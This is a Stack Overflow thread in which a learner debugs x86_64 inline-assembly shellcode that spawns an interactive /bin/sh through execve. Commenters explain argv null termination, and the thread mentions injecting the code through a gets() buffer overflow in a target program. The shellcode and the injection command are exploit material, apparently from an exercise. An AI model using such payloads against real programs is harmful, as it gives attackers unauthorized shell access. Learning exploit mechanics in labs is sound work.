# shellcode: pass arguments to execve in x86_64 assembly

Tags: c, assembly, shellcode

I'm trying to write a shellcode that runs execve. The equivalent c program looks like this:

```
int main ()
{

  char *argv[3] = {"/bin/sh","-i", "/dev/tty", NULL};
  execve("/bin/sh", argv, NULL);

  return 0;
}
```

The c program runs fine. Then I tries to write my test program like this(revised to push null):

```
#include<stdio.h>
int main(){
    __asm__(
            "xor    %rdx,%rdx\n\t"   //rdx is the third argument for execve, null in this case.
            "push   %rdx\n\t"
            "mov    -8(%rbp),%rdx\n\t"
            "mov    $0x692d,%rdi\n\t" //$0x6924 is 'i-'
            "push   %rdi\n\t"         //push '-i' to the stack
            "lea    -16(%rbp),%rax\n\t"    //now rax points to '-i'
            "mov    $0x31b7f54a83,%rdi\n\t" //the address of /bin/sh
            "push   %rdi\n\t"                //push it to the stack              
            "push   %rdx\n\t"                //end the array with null
            "mov    $0x31b7e43bb3,%rdi\n\t"  //the address of "/bin/sh"
            "push   %rdi\n\t"              //push the address of "/dev/tty to the stack
            "push   %rax\n\t"              //push the address of '-i' to the stack
            "mov    $0x31b7f54a83,%rdi\n\t"
            "push   %rdi\n\t"              //push the address of /bin/sh again to the stack
            "mov    %rsp,%rsi\n\t"         //rsi now points to the beginning of the array
            "mov    -24(%rbp),%rdi\n\t"   //rdi now points to the addresss of "/bin/sh"
            "mov    $0x3b,%rax\n\t"               // syscall number = 59
            "syscall\n\t"
    );
    }
```

I have the addresses of the strings in the memory here and we can assume they won't change. But we don't have the address of string '-i'. So what I'm doing here is pushing the arguments into the stack like this:

---

```
Low                  ------------------------------------------------------------------             High

|addressof"/bin/sh"(rsi points to here)|addressof"-i"|addressof"/dev/ssh"|addressof"/bin/sh"(rdi points to here)|-i|
```

---

It didn't work. The program compiled ok but when I ran the program, nothing happened.

I'm not familiar with assembly and I have some concerns about the way arguments are passed, for example, how does the compiler know when the argv argument ends in the memory?

**EDIT**

Thanks to the suggestion below by Niklas B, I used trace to see if execve actually runs. And I got `execve(0x31b7f54a83, [0x31b7f54a83, "-i", 0x31b7e43bb3, 0x31b7f54a83, 0x692d], [/* 0 vars */]) = -1 EFAULT (Bad address)`, which means the second argument is passed wrong. Everything that I pushed into the stack is considered part of the argv argument!

After I push nulls into the stack, the strace gives `execve(0x31b7f54a83, [0x31b7f54a83, "-i", 0x31b7e43bb3], [/* 0 vars */]) = -1 EFAULT (Bad address)`. This is quite close to the right answer only if the addresses are strings...

Thanks to Brian, I now see where the problem lies now. The hardcoded addresses are in the share libary of another program. So this program shouldn't run until it's actually fed into that program. Thanks everyone, I'll update this as soon as I can. Id the problem's solved, I'll mark it as solved.

Comment: Null termination! Null termination!

Comment: @KerrekSB so I need to push 0x00 into the stack too?

Comment: (Not saying that this is related to your problem.) The arrays need to be terminated by a null pointer. Also, passing `NULL` as an argument is a non-portable Linux hack, and shouldn't be relied on. See [the manual](http://man7.org/linux/man-pages/man2/execve.2.html).

Comment: By using `strace`, you can verify whether a syscall is actually triggered.

Comment: @NiklasB. Thank you so much! I got this:`execve(0x31b7f54a83, [0x31b7f54a83, "-i", 0x31b7e43bb3, 0x31b7f54a83, 0x692d], [/* 0 vars */]) = -1 EFAULT (Bad address)` which means the argv argument is wrong."-i" should be there and there should only be 3 strings in it not 5.

Comment: I think you're supposed to place a NULL at the end of this `char *argv[3] = {"/bin/sh","-i", "/dev/tty"};` instead of placing it in the syscall `char *argv[] = {"/bin/sh","-i", "/dev/tty", NULL};`

Comment: @Gnijuohz Where are you getting that the addresses `0x31b7f54a83` and `0x31b7e43bb3` point to `/bin/sh` and `/dev/tty`? According to the `strace` output, it doesn't appear that these strings are at the locations you are expecting. Are these supposed to be where the strings reside in the target program that you're injecting your shell code into? Are you actually injecting your code into the target program, or just running it standalone? If you're trying to run it standalone, those strings may not exist at the given addresses.

Comment: @BrianCampbell Ah, so actually if the addresses are right it will work? Yes... I want to inject it into another program. Now it all make sense now! Thank you so much!

Answer (score 3, accepted):

As Kerrek SB and user9000 point out in the comments, the `argv` array needed to be a null-terminated array of strings.

Once that is fixed, running this program standalone still won't work, as the strings `"/bin/sh"` and `"/dev/tty"` presumably don't exist at that location in the program that you have just compiled, but rather exist at that location in the program that the shell code is designed to target. You need to actually inject it into that program so it will execute there, where those strings are at those addresses.

Comment: Thanks so much, I'll accept your answer as soon as I try it out.

Comment: Hi brian, it worked... But when I used it as a buffer overflow attack, I alwways got a Bus error, any idea why that happened?

Comment: @Gnijuohz I'm not sure right away. Would you mind posting another question with more information about your new problem? Show the exact code that you're injecting, what you're injecting it into, how you're doing it, and the results you get. It would be good to try to break in GDB right before it hits your code, and step through it to see where exactly you're getting the bus error. That might help you find it, or might give you enough information to ask a new question where someone will be able to help you out.

Comment: I don't know exactly how I can use gdb to do that. The target program is fed with the shellcode like this `cat shellcodefile -| ./targetprogram`. The target program has a buffer and use `gets` to read from input. should I use gdb like this `cat shellcodefile -| gdb ./targetprogram`? Then use step to step through? I'm really not familiar with gdb.

Comment: Hi Brian I've posted that question over here:http://stackoverflow.com/questions/19534658/shellcode-kept-getting-error can you take a look at it?